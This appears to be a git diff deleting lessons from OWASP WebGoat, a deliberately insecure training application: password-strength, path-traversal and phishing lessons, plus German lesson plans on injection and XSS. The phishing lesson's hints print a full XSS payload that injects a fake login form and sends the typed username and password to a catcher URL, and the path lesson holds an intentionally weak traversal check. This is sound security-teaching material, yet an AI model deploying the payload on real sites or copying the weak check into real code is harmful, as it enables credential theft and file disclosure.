- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Reto Lippuner, Marcel Wirth
- * @created April 7, 2008
- */
-
-public class PasswordStrength extends LessonAdapter
-{
- private Map passwords = new TreeMap() {{
- put("pass1", new Password("123456", "seconds", "0", "dictionary based, in top 10 most used passwords"));
- put("pass2", new Password("abzfezd", "seconds", "2", "26 chars on 7 positions, 8 billion possible combinations"));
- put("pass3", new Password("a9z1ezd", "seconds", "19", "26 + 10 chars on 7 positions = 78 billion possible combinations"));
- put("pass4", new Password("aB8fEzDq", "hours", "15", "26 + 26 + 10 chars on 8 positions = 218 trillion possible combinations"));
- put("pass5", new Password("z8!E?7D$", "days", "20", "96 chars on 8 positions = 66 quintillion possible combinations"));
- put("pass6", new Password("My1stPassword!:Redd", "quintillion years", "364", "96 chars on 19 positions = 46 undecillion possible combinations"));
- }};
-
- private class Password {
-
- String password;
- String timeUnit;
- String answer;
- private String explanation;
-
- public Password(String password, String timeUnit, String answer, String explanation) {
- this.password = password;
- this.timeUnit = timeUnit;
- this.answer = answer;
- this.explanation = explanation;
- }
- }
-
- private boolean checkSolution(WebSession s) throws ParameterNotFoundException {
- boolean allCorrect = true;
- for ( int i = 1; i <= passwords.size(); i++ ) {
- String key = "pass" + i;
- allCorrect = allCorrect && s.getParser().getStringParameter(key, "").equals(passwords.get(key).answer);
- }
- return allCorrect;
- }
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
-
- try
- {
- if (checkSolution(s))
- {
- makeSuccess(s);
- ec.addElement(new BR());
- ec.addElement(new StringElement("As a guideline not bound to a single solution."));
- ec.addElement(new BR());
- ec.addElement(new StringElement("Assuming the calculations per second 4 billion: "));
- ec.addElement(new BR());
- OL ol = new OL();
- for ( Password password : passwords.values()) {
- ol.addElement(new LI(String.format("%s - %s %s (%s)", password.password, password.answer, password.timeUnit, password.explanation)));
- }
- ec.addElement(ol);
- } else
- {
- ec.addElement(new BR());
- ec.addElement(new StringElement("How much time would a desktop PC take to crack these passwords?"));
- ec.addElement(new BR());
- ec.addElement(new BR());
- Table table = new Table();
- for ( Entry entry : passwords.entrySet()) {
- TR tr = new TR();
- TD td1 = new TD();
- TD td2 = new TD();
- Input input1 = new Input(Input.TEXT, entry.getKey(), "");
- td1.addElement(new StringElement("Password = " + entry.getValue().password));
- td1.setWidth("50%");
- td2.addElement(input1);
- td2.addElement(new StringElement(" " + entry.getValue().timeUnit));
- tr.addElement(td1);
- tr.addElement(td2);
- table.addElement(tr);
- }
- ec.addElement(table);
- ec.addElement(new BR());
- ec.addElement(new BR());
- Div div = new Div();
- div.addAttribute("align", "center");
- Element b = ECSFactory.makeButton("Go!");
- div.addElement(b);
- ec.addElement(div);
- }
- } catch (Exception e)
- {
- s.setMessage("Error generating " + this.getClass().getName());
- e.printStackTrace();
- }
-
-
- return (ec);
- }
-
- /**
- * Gets the hints attribute of the HelloScreen object
- *
- * @return The hints value
- */
- public List getHints(WebSession s)
- {
- List hints = new ArrayList();
- hints.add("Copy the passwords into the code checker.");
- return hints;
- }
-
- /**
- * Gets the ranking attribute of the HelloScreen object
- *
- * @return The ranking value
- */
- private final static Integer DEFAULT_RANKING = new Integer(6);
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- protected Category getDefaultCategory()
- {
- return Category.AUTHENTICATION;
- }
-
- public String getInstructions(WebSession s)
- {
- String instructions = "The accounts of your web application are only as save as the passwords. "
- + "For this exercise, your job is to test several passwords on https://howsecureismypassword.net. "
- + " You must test all 6 passwords at the same time... "
- + " On your applications you should set good password requirements! ";
- return (instructions);
- }
-
- /**
- * Gets the title attribute of the HelloScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("Password Strength");
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("Created by: Reto Lippuner, Marcel Wirth", new StringElement(""));
- }
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/PathBasedAccessControl.java b/src/main/java/org/owasp/webgoat/lessons/PathBasedAccessControl.java
deleted file mode 100644
index 93fbe421a..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/PathBasedAccessControl.java
+++ /dev/null
@@ -1,268 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.io.BufferedReader;
-import java.io.File;
-import java.io.FileReader;
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.HR;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Bruce Mayhew WebGoat
- * @created October 28, 2003
- */
-public class PathBasedAccessControl extends LessonAdapter
-{
-
- private final static String FILE = "File";
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
-
- try
- {
- String dir = s.getContext().getRealPath("/lesson_plans/en");
- File d = new File(dir);
-
- Table t = new Table().setCellSpacing(0).setCellPadding(2).setWidth("90%").setAlign("center");
-
- if (s.isColor())
- {
- t.setBorder(1);
- }
-
- String[] list = d.list();
- String listing = "
";
-
- TR tr = new TR();
- tr.addElement(new TD().setColSpan(2).addElement(new StringElement(listing)));
- t.addElement(tr);
-
- tr = new TR();
- tr.addElement(new TD().setWidth("35%").addElement(ECSFactory.makePulldown(FILE, list, "", 15)));
- tr.addElement(new TD().addElement(ECSFactory.makeButton(getLabelManager().get("ViewFile"))));
- t.addElement(tr);
-
- ec.addElement(t);
-
- // FIXME: would be cool to allow encodings here -- hex, percent,
- // url, etc...
- String file = s.getParser().getRawParameter(FILE, "");
-
- // defuse file searching
- boolean illegalCommand = getWebgoatContext().isDefuseOSCommands();
- if (getWebgoatContext().isDefuseOSCommands())
- {
- // allow them to look at any file in the webgoat hierachy. Don't
- // allow them
- // to look about the webgoat root, except to see the LICENSE
- // file
- if (upDirCount(file) == 3 && !file.endsWith("LICENSE"))
- {
- s.setMessage(getLabelManager().get("AccessDenied"));
- s.setMessage(getLabelManager().get("ItAppears1"));
- }
- else if (upDirCount(file) > 3)
- {
- s.setMessage(getLabelManager().get("AccessDenied"));
- s.setMessage(getLabelManager().get("ItAppears2"));
- }
- else
- {
- illegalCommand = false;
- }
- }
-
- // Using the URI supports encoding of the data.
- // We could force the user to use encoded '/'s == %2f to make the lesson more difficult.
- // We url Encode our dir name to avoid problems with special characters in our own path.
- // File f = new File( new URI("file:///" +
- // Encoding.urlEncode(dir).replaceAll("\\\\","/") + "/" +
- // file.replaceAll("\\\\","/")) );
- File f = new File((dir + "\\" + file).replaceAll("\\\\", "/"));
-
- if (s.isDebug())
- {
-
- s.setMessage(getLabelManager().get("File") + file);
- s.setMessage(getLabelManager().get("Dir")+ dir);
- // s.setMessage("File URI: " + "file:///" +
- // (Encoding.urlEncode(dir) + "\\" +
- // Encoding.urlEncode(file)).replaceAll("\\\\","/"));
- s.setMessage(getLabelManager().get("IsFile")+ f.isFile());
- s.setMessage(getLabelManager().get("Exists") + f.exists());
- }
- if (!illegalCommand)
- {
- if (f.isFile() && f.exists())
- {
- // Don't set completion if they are listing files in the
- // directory listing we gave them.
- if (upDirCount(file) >= 1)
- {
- s.setMessage(getLabelManager().get("CongratsAccessToFileAllowed"));
- s.setMessage(" ==> " + Encoding.urlDecode(f.getCanonicalPath()));
- makeSuccess(s);
- }
- else
- {
- s.setMessage(getLabelManager().get("FileInAllowedDirectory"));
- s.setMessage(" ==> " + Encoding.urlDecode(f.getCanonicalPath()));
- }
- }
- else if (file != null && file.length() != 0)
- {
- s
- .setMessage(getLabelManager().get("AccessToFileDenied1") + Encoding.urlDecode(f.getCanonicalPath())
- + getLabelManager().get("AccessToFileDenied2"));
- }
- else
- {
- // do nothing, probably entry screen
- }
-
- try
- {
- // Show them the file
- // Strip out some of the extra html from the "help" file
- ec.addElement(new BR());
- ec.addElement(new BR());
- ec.addElement(new HR().setWidth("100%"));
- ec.addElement(getLabelManager().get("ViewingFile")+ f.getCanonicalPath());
- ec.addElement(new HR().setWidth("100%"));
- if (f.length() > 80000) { throw new Exception(getLabelManager().get("FileTooLarge")); }
- String fileData = getFileText(new BufferedReader(new FileReader(f)), false);
- if (fileData.indexOf(0x00) != -1) { throw new Exception(getLabelManager().get("FileBinary")); }
- ec.addElement(new StringElement(fileData.replaceAll(System.getProperty("line.separator"), " ")
- .replaceAll("(?s)", "").replaceAll("
", " ")
- .replaceAll(" \\s ", " ").replaceAll("<\\?", "<").replaceAll("<(r|u|t)",
- "<$1")));
- } catch (Exception e)
- {
- ec.addElement(new BR());
- ec.addElement(getLabelManager().get("TheFollowingError"));
- ec.addElement(e.getMessage());
- }
- }
- } catch (Exception e)
- {
- s.setMessage(getLabelManager().get("ErrorGenerating")+ this.getClass().getName());
- e.printStackTrace();
- }
-
- return (ec);
- }
-
- private int upDirCount(String fileName)
- {
- int count = 0;
- int startIndex = fileName.indexOf("..");
- while (startIndex != -1)
- {
- count++;
- startIndex = fileName.indexOf("..", startIndex + 1);
- }
- return count;
- }
-
- /**
- * DOCUMENT ME!
- *
- * @return DOCUMENT ME!
- */
- protected Category getDefaultCategory()
- {
- return Category.ACCESS_CONTROL;
- }
-
- /**
- * Gets the hints attribute of the AccessControlScreen object
- *
- * @return The hints value
- */
- protected List getHints(WebSession s)
- {
- List hints = new ArrayList();
- hints.add(getLabelManager().get("PathBasedAccessControlHint1"));
- hints.add(getLabelManager().get("PathBasedAccessControlHint2"));
- hints.add(getLabelManager().get("PathBasedAccessControlHint3"));
- hints.add(getLabelManager().get("PathBasedAccessControlHint4"));
-
- return hints;
- }
-
- /**
- * Gets the instructions attribute of the WeakAccessControl object
- *
- * @return The instructions value
- */
- public String getInstructions(WebSession s)
- {
- String instructions = getLabelManager().get("PathBasedAccessControlInstr1")+ s.getUserName() + getLabelManager().get("PathBasedAccessControlInstr2");
-
- return (instructions);
- }
-
- private final static Integer DEFAULT_RANKING = new Integer(115);
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- /**
- * Gets the title attribute of the AccessControlScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("Bypass a Path Based Access Control Scheme");
- }
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/Phishing.java b/src/main/java/org/owasp/webgoat/lessons/Phishing.java
deleted file mode 100644
index 9cfd2a357..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/Phishing.java
+++ /dev/null
@@ -1,297 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.B;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Comment;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.HR;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TH;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.Catcher;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Bruce Mayhew WebGoat
- * @created March 13, 2007
- */
-public class Phishing extends LessonAdapter
-{
-
- /**
- * Description of the Field
- */
- protected final static String SEARCH = "Username";
- private String searchText;
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
- private boolean postedCredentials(WebSession s)
- {
- String postedToCookieCatcher = getLessonTracker(s).getLessonProperties().getProperty(Catcher.PROPERTY,
- Catcher.EMPTY_STRING);
-
- //
- return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING));
- //
- }
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
-
- try
- {
- searchText = s.getParser().getRawParameter(SEARCH, "");
- //
- //
-
- ec.addElement(makeSearch(s));
- if (postedCredentials(s))
- {
- makeSuccess(s);
- }
- } catch (Exception e)
- {
- s.setMessage("Error generating " + this.getClass().getName());
- }
-
- return (ec);
- }
-
- protected Element makeSearch(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
-
- ec.addElement(new H1().addElement("WebGoat Search "));
- Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setAlign("center");
-
- TR tr = new TR();
- tr.addElement(new TD().addElement(" ").setColSpan(2));
- t.addElement(tr);
- if (s.isColor())
- {
- t.setBorder(1);
- }
-
- tr = new TR();
- tr.addElement(new TH().addElement("This facility will search the WebGoat source.").setColSpan(2)
- .setAlign("center"));
- t.addElement(tr);
-
- tr = new TR();
- tr.addElement(new TD().addElement(" ").setColSpan(2));
- t.addElement(tr);
-
- TR row1 = new TR();
- row1.addElement(new TD(new B(new StringElement("Search: "))).setAlign("right"));
-
- Input input1 = new Input(Input.TEXT, SEARCH, searchText);
- row1.addElement(new TD(input1).setAlign("left"));
- t.addElement(row1);
-
- Element b = ECSFactory.makeButton("Search");
- t.addElement(new TR(new TD(b).setColSpan(2)).setAlign("center"));
- ec.addElement(t);
-
- if (!searchText.equals(""))
- {
- ec.addElement(new BR());
- ec.addElement(new HR());
- ec.addElement(new BR());
- ec.addElement(new StringElement("Results for: " + searchText));
- ec.addElement(new Comment("Search results"));
- ec.addElement(new BR());
- ec.addElement(new BR());
- ec.addElement(new B(new StringElement("No results were found.")));
- ec.addElement(new Comment("End of Search results"));
- }
-
- return (ec);
- }
-
- /**
- * Gets the hints attribute of the CluesScreen object
- *
- * @return The hints value
- */
- protected List getHints(WebSession s)
- {
- List hints = new ArrayList();
- hints.add("Try adding HTML to the search field to create a fake authentication form. "
- + "Try to make the form look official.");
- hints
- .add("Try: "
- + "<form name="phish"><br><br><HR><H3>This feature requires account login:</H2"
- + "><br><br>Enter Username:<br><input type="text" "
- + "name="user"><br>Enter Password:<br><input type="password" "
- + "name = "pass"><br></form><br><br><HR>");
- hints
- .add("Add functionality that can post a request, a button might work
"
- + "After getting the button on the page, don't forget you will need to steal the credentials and post them to: "
- + "http://localhost/webgoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
- hints
- .add("Try: "
- + "<input type="submit" name="login" "
- + "value="login">"
- + "
In the whole script:
"
- + "<form name="phish"><br><br><HR><H3>This feature requires account login:</H2"
- + "><br><br>Enter Username:<br><input type="text" "
- + "name="user"><br>Enter Password:<br><input type="password" "
- + "name = "pass"><br><input type="submit" name="login" "
- + "value="login" onclick="hack()"></form><br><br><HR>");
- hints
- .add("Make the button perform an action on submit, "
- + "adding an onclick=\"hack()\" might work "
- + "Don't forget to add the hack() javascript function"
- + "
In the whole script:
"
- + "<form name="phish"><br><br><HR><H3>This feature requires account login:</H2"
- + "><br><br>Enter Username:<br><input type="text" "
- + "name="user"><br>Enter Password:<br><input type="password" "
- + "name = "pass"><br><input type="submit" name="login" "
- + "value="login" onclick="hack()"></form><br><br><HR> "
- + "Also, check firebug. Does the search form need to be terminated for this to work...? (</form>)");
- hints
- .add("You need to create the hack() function. This function will pull the credentials from the "
- + "webpage and post them to the WebGoat catcher servlet. "
- + " Some useful code snippets:
"
- + "
doucument.phish.user.value - will access the user field"
- + "
XssImage = new Image(); XssImage.src=SOME_URL = will perform a post"
- + "
javascript string concatentation uses a \"+\"
"
- + "
The entire javascript portion:
"
- + "<script>function hack(){ "
- + "XSSImage=new Image; XSSImage.src="http://localhost/webgoat/catcher?PROPERTY=yes&user="+"
- + "document.phish.user.value + "&password=" + document.phish.pass.value + "";"
- + "alert("Had this been a real attack... Your credentials were just stolen."
- + "\nUser Name = " + document.phish.user.value + "\nPassword = " + document.phish.pass.value);} "
- + "</script>");
- hints
- .add("Complete solution for this lesson:
"
- + "</form><script>function hack(){ "
- + "XSSImage=new Image; XSSImage.src="http://localhost/webgoat/catcher?PROPERTY=yes&user="+"
- + "document.phish.user.value + "&password=" + document.phish.pass.value + "";"
- + "alert("Had this been a real attack... Your credentials were just stolen."
- + "\nUser Name = " + document.phish.user.value + "\nPassword = " + document.phish.pass.value);} "
- + "</script><form name="phish"><br><br><HR><H3>This feature requires account login:</H2"
- + "><br><br>Enter Username:<br><input type="text" "
- + "name="user"><br>Enter Password:<br><input type="password" "
- + "name = "pass"><br><input type="submit" name="login" "
- + "value="login" onclick="hack()"></form><br><br><HR>");
- /**
- * password
- *
- *
- *
-"Basic Authentication" wird benutzt um Server-seitige Resource zu schützen. Wird eine Anfrage an eine geschützte Resource gestellt, so sendet der Webserver ein "401 authentication request" mit der Antwort auf diese Anfrage.
-Dann fragt, auf der Client Seite, der Browser den Benutzer mittels einer Dialogbox nach Benutzername und Passwort für diese Resource.
-Der Browser enkodiert Benutzername und Passwort mit base64 und sendet diese Zugangsdaten zum Webserver.
-Daraufhin validiert der Webserver Benutzername und Passwort und gibt als Antwort die angeforderte Resource zurück falls die übermittelten Zugangsdaten korrekt sind.
-Die Zugangsdaten werden vom Browser bei jedem weiteren Zugriff auf geschützte Resourcen mitgesendet ohne dass der Benutzer
-sie ein weiteres Mal eingeben muss.
-
-
Grundsätzliche(s) Ziel(e):
-Das Ziel dieser Lektion ist es "Basic Authentication" zu verstehen und die folgenden Fragen zu beantworten.
-
diff --git a/src/main/webapp/lesson_plans/German/CommandInjection.html b/src/main/webapp/lesson_plans/German/CommandInjection.html
deleted file mode 100644
index a8de365cb..000000000
--- a/src/main/webapp/lesson_plans/German/CommandInjection.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
Lehrplan: Einschleusen von Programmcode
-
-
Konzept:
-
-Das Einschleusen von Programmcode stellt eine ernst zu nehmende Bedrohung für dynamische Webseiten dar. Entsprechende Angriffe
-sind leicht zu lernen und der verursachte Schaden ist schwer bzw. entspricht der Kompromittierung des kompletten Systems.
-Trotz dieses Gefahrenpotentials ist eine unglaubliche Anzahl von Systemen im Internet für diese Form des Angriffs verwundbar.
-Dieser Angriff ist zwar leicht durchzuführen, allerdings ist er auch mit ein wenig gesundem Menschenverstand und Vorausdenken
-leicht zu verhindern. Die anerkannte Vorgehensweise zur Verhinderung dieser Angriffstypen
-besteht darin alle Eingabedaten zu säubern, insbesondere die Daten die in Betriebssystembefehlen,
-Skripten und Datenbankabfragen eingebaut werden.
-
Grundsätzliche(s) Ziel(e):
-
-Schleusen Sie einen Befehl in das darunterliegende Betriebssystem ein.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/German/HiddenFieldTampering.html b/src/main/webapp/lesson_plans/German/HiddenFieldTampering.html
deleted file mode 100644
index c4606ac75..000000000
--- a/src/main/webapp/lesson_plans/German/HiddenFieldTampering.html
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
Lehrplan: Versteckte Felder ausnutzen
-
-
Konzept:
-
-Entwickler benutzen versteckte Formularfelder zur Besucherverfolgung, für den Login, für Preisinformationen und andere
-Informationen. Dies ist ein sehr einfacher und bequemer Mechnismus für Entwickler, allerdings werden die Werte
-diese Felder nur selten geprüft bevor sie benutzt werden. In dieser Lektion lernt man wie man versteckte Felder
-zu seinem Vorteil manipulieren kann.
-
-
-
-
Grundsätzliche(s) Ziel(e):
-Nutzen Sie ein verstecktes Formularfeld aus, um den HD Fernseher zu einem falschen Preis zu kaufen.
diff --git a/src/main/webapp/lesson_plans/German/HtmlClues.html b/src/main/webapp/lesson_plans/German/HtmlClues.html
deleted file mode 100644
index 70d63e5ee..000000000
--- a/src/main/webapp/lesson_plans/German/HtmlClues.html
+++ /dev/null
@@ -1,13 +0,0 @@
-
-
Lehrplan: Nützliche Hinweise in HTML entdecken.
-
-
-
Konzept:
-
- Entwickler lassen oftmals Kommentare wie FIXME's, TODO's, Code Broken, Hack usw. im Quellcode.
- Durchsuchen Sie den Quellcode nach allem was für Sie nach Passwörtern, Hintertüren oder anderen Unregelmäßigkeiten aussieht.
-
-
-
-
Grundsätzliche(s) Ziel(e):
-Sie suchen und finden Hinweise im Quellcode die es Ihnen erlauben sich anzumelden.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/German/HttpBasics.html b/src/main/webapp/lesson_plans/German/HttpBasics.html
deleted file mode 100644
index 995912eeb..000000000
--- a/src/main/webapp/lesson_plans/German/HttpBasics.html
+++ /dev/null
@@ -1,29 +0,0 @@
-
-
Lehrplan: Http Basics
-
-
-
Lehrinhalt:
- Diese Lektion stellt die Verständnis-Grundlagen für den Datentransport zwischen Browser und Webapplikation dar.
-
-
-So funktioniert HTTP:
-
-Alle HTTP Transaktionen folgen demselben Schema. Jede Anfrage vom Client und jede Antwort des Servers besteht aus drei Teilen: Der Anfrage-/Antwortzeile, dem Kopf und dem Körper.
-Der Client initiiert eine Transaktion wie folgt:
-
- Der Client kontaktiert den Server und sendet eine Dokumentenanfrage
-
-
-
GET /index.html?param=value HTTP/1.0
- Als nächstes sendet der Client optionale Kopfzeilen (Header) um den Server über die Client-seitige Konfiguration und die akzeptierten Dokumentenformate zu informieren.
-
-
-Nachdem der eigentliche Anfrage (Request) und den weiteren Kopfzeilen (Header) kann der Client noch weitere Daten senden. Diese Daten werden meistens von CGI Programmen im Zusammenhang mit der POST Methode ausgewertet.
-
-
Grundsätzliche(s) Ziel(e):
-
-Geben Sie Ihren Namen in das Eingabefeld ein und drücken sie "Los gehts!" um die Anfrage abzuschicken. Der Server wird die Anfrage akzeptieren, Ihre Eingabedaten umdrehen, und wieder zu Ihnen zurückschicken. Dies stellt eine vollständige HTTP Transaktion dar!
-
-Sie sollten mit der Benutzung von WebGoat vertraut werden. Es sollten die Knöpfe für Hinweise (Hints), für das Anzeigen von Parametern(Parameters) oder Cookies und für das Anzeigen von Java-Quellcode ausprobiert werden.
-Außerdem, können Sie hier WebScarab gut ausprobieren.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/German/JavaScriptValidation.html b/src/main/webapp/lesson_plans/German/JavaScriptValidation.html
deleted file mode 100644
index f278bc9d9..000000000
--- a/src/main/webapp/lesson_plans/German/JavaScriptValidation.html
+++ /dev/null
@@ -1,19 +0,0 @@
-
-
-Client-seitige Validierung sollte nicht als eine sichere Maßnahme zur Validierung von Parametern angesehen werden.
-Diese Art der Validierung kann höchstens den Server entlasten und verhindern das normale Benutzer Eingabedaten in
-einem falschen Format absenden. Angreifer hingegen, können diesen Mechanismus auf verschiedene Arten umgehen. Jede
-Client-seitige Validierung sollte auf der Serverseite wiederholt werden. Dies verhindert, dass unsichere Parameter
-in der Applikation benutzt werden.
-
-
-
Grundsätzliche(s) Ziel(e):
-
-Das untenstehende Formular verlangt von Ihnen verschiedene Regeln beim Ausfüllen einzuhalten. Dies wird Client-seitig
-überprüft. Versuchen Sie diese
-Regeln zu brechen und senden Sie Daten an die Webseite die die Webseite nicht erwartet! Sie müssen alle 7 Regeln
-gleichzeitig brechen!
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/German/LogSpoofing.html b/src/main/webapp/lesson_plans/German/LogSpoofing.html
deleted file mode 100644
index c5bbff3b0..000000000
--- a/src/main/webapp/lesson_plans/German/LogSpoofing.html
+++ /dev/null
@@ -1,17 +0,0 @@
-
-
Lehrplan: Fälschen von Einträgen in Log Dateien (Log Spoofing)
-
-
-
Konzept:
-
-Log-Einträge in Log-Dateien müssen nicht immer von tatsächlichen Ereignissen stammen. Ein Angreifer kann durch Einschleusen
-bestimmter Einträge das Eintreten bestimmter Ereignisse vortäuschen und dadurch den Administrator zu unnötigen bzw. voreiligen
-Handlungen verleiten bzw. ihn einfach nur verwirren.
-
-
-
Grundsätzliche(s) Ziel(e):
-
-* Der graue Bereich steht für das was tatsächlich in der Log-Datei des Webservers erscheint.
-* Ihr Ziel ist es so aussehen zu lassen, als hätte sich der Benutzer "admin" erfolgreich eingeloggt.
-* Verbessern Sie Ihren Angriff, indem Sie ein Skript (Javascript) in das Log schreiben.
-
diff --git a/src/main/webapp/lesson_plans/German/PathBasedAccessControl.html b/src/main/webapp/lesson_plans/German/PathBasedAccessControl.html
deleted file mode 100644
index c7afce017..000000000
--- a/src/main/webapp/lesson_plans/German/PathBasedAccessControl.html
+++ /dev/null
@@ -1,11 +0,0 @@
-
-
Lehrplan: Umgehen eines Pfad-basierten Zugangskontrollschemas
-
-
Konzept:
-
-In einem Pfad-basierten Zugangangskontrollschemas (path based access control scheme), kann ein Angreifer den Pfad "bewandern" indem
-er relative Pfadangaben übergibt. Dadurch kann der Angreifer auf Dateien zugreifen, die für niemanden zugänglich sind, bzw. zu denen
-der Zugang bei direkter Anfrage ansonsten abgelehnt würde.
-
-
Grundsätzliche(s) Ziel(e):
-Sie sollten in der Lage sein auf eine Datei zuzugreifen die sich nicht im aufgelisteten Verzeichnis befindet.
diff --git a/src/main/webapp/lesson_plans/German/ReflectedXSS.html b/src/main/webapp/lesson_plans/German/ReflectedXSS.html
deleted file mode 100644
index 60f5e0e80..000000000
--- a/src/main/webapp/lesson_plans/German/ReflectedXSS.html
+++ /dev/null
@@ -1,19 +0,0 @@
-
-
Lehrplan: Cross Site Scripting (XSS)
-
-
Konzept:
-
-Jegliche Eingabedaten sollten auf der Serverseite überprüft werden.
-XSS passiert wenn nicht geprüfte Benutereingaben in eine HTTP Response eingebaut werden.
-Bei einem reflektierten XSS Angriff, kann ein Angreifer eine URL erzeugen die ein Angriffsskript enthält und kann diese
-URL auf einer Webseite hinterlegen, sie per Email verschicken oder ein Opfer auf eine andere Weise dazu bringen die
-URL zu besuchen.
-
-
-
-
General Goal(s):
-
-Ihre Aufgabe ist es, sich ein Stück Javascript zu überlegen das Sie in diese Seite einbauen können.
-Dann versuchen Sie die Seite dazu zu bringen, Ihnen dieses Skript wieder auszulieferen (es zu reflektieren)
-so dass das Skript in Ihrem Browser ausgeführt wird.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/German/RemoteAdminFlaw.html b/src/main/webapp/lesson_plans/German/RemoteAdminFlaw.html
deleted file mode 100644
index dbaaeb3c3..000000000
--- a/src/main/webapp/lesson_plans/German/RemoteAdminFlaw.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
Lehrplan: Zugang zu Web-Resourcen erzwingen
-
-
Konzept::
-Applikationen haben oftmals eine Administrationsschnittstelle, das priviligierten Benutzern Zugang zu Funktionalität ermöglicht die
-für normale Benutzer nicht sichtbar ist. Der Applikationsserver selbst hat auch oft noch eine seperate Administrationsschnittstelle.
-
-
Grundsätzliche(s) Ziel(e):
-
-Versuchen Sie auf die Administrationsschnittstelle von WebGoat zuzugreifen. Sie können auch versuchen auf die Administrationsschnittstelle
-von Tomcat (der Applikationsserver) zuzugreifen. Die Tomcat Schnittstelle kann über die URL /admin erreicht werden, zählt aber nicht
-für das Bestehen dieser Lektion.
-Wenn Sie Zugriff auf Funktionalität der Administrationsschnittstelle erlangt haben, dann kommen Sie hierher zurück um zu sehen ob Sie
-die Lektion abgeschlossen haben.
-
-
-SQL Injection Angriffe stellen eine ernstzunehmende Bedrohung für alle Datenbank-getriebenen Webseiten dar.
-Entsprechende Angriffe sind leicht zu lernen und der verursachte Schaden ist schwer bzw. entspricht der
